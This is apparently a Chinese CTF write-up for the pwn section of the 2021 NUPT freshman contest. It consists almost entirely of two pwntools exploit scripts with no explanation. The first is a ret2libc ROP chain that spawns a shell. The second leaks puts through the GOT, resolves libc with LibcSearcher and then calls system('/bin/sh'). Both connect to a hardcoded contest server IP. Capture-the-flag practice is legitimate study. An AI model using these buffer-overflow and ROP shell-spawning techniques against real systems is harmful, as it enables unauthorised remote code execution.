南邮2021新生赛PWN部分

直接上exp了

Ret2Libc

from pwn import*

p = remote('121.4.15.155',10001)
#p = process('./ny_ret2libc')

pop_rdi_addr=0x401223
pop_rsi_addr=0x401221
bin_sh_addr=0x404040
system_addr=0x401040
 
payload2=b"B"*88+p64(pop_rdi_addr)+p64(bin_sh_addr)+p64(system_addr)
 
p.sendline(payload2)
p.interactive()

Ret2Lbic pro max

from LibcSearcher import *
from pwn import *

#context(os="linux", arch="amd64")
#context.log_level="debug"

local = 0
elf = ELF('./ny_ret2libc2')
ret_addr = 0x40101a
pop_rdi = 0x401223

if local:
    pro = process('./ny_ret2libc2')
else:
    pro = remote('121.4.15.155', 10004)

def get_libcbase():
    puts_plt=elf.plt['puts']   
    puts_got=elf.got['puts'] 
    main_addr = elf.sym['main']
    payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    pro.sendlineafter('funny\n',payload)
    puts_addr= u64(pro.recv(6).ljust(8,b'\x00'))
    # puts_addr = u64(pro.recv(8))
    libc = LibcSearcher('puts',puts_addr)
    libc_addr = puts_addr - libc.dump('puts')
    print('________________',hex(libc_addr))
    return libc,libc_addr

def get_shell(libc,libc_addr):
    binsh=libc_addr+libc.dump('str_bin_sh')
    system=libc_addr+libc.dump('system')
    payload=b'a'*(0x50+8)+p64(pop_rdi)+p64(binsh)+p64(system)
    pro.sendlineafter('funny\n',payload)

    pro.interactive()


if __name__ == '__main__' :
    libc ,libc_addr = get_libcbase()
    get_shell(libc,libc_addr)

南邮2021新生赛PWN部分

南邮2021新生赛PWN部分

直接上exp了

Ret2Libc

Ret2Lbic pro max

暂无评论

目录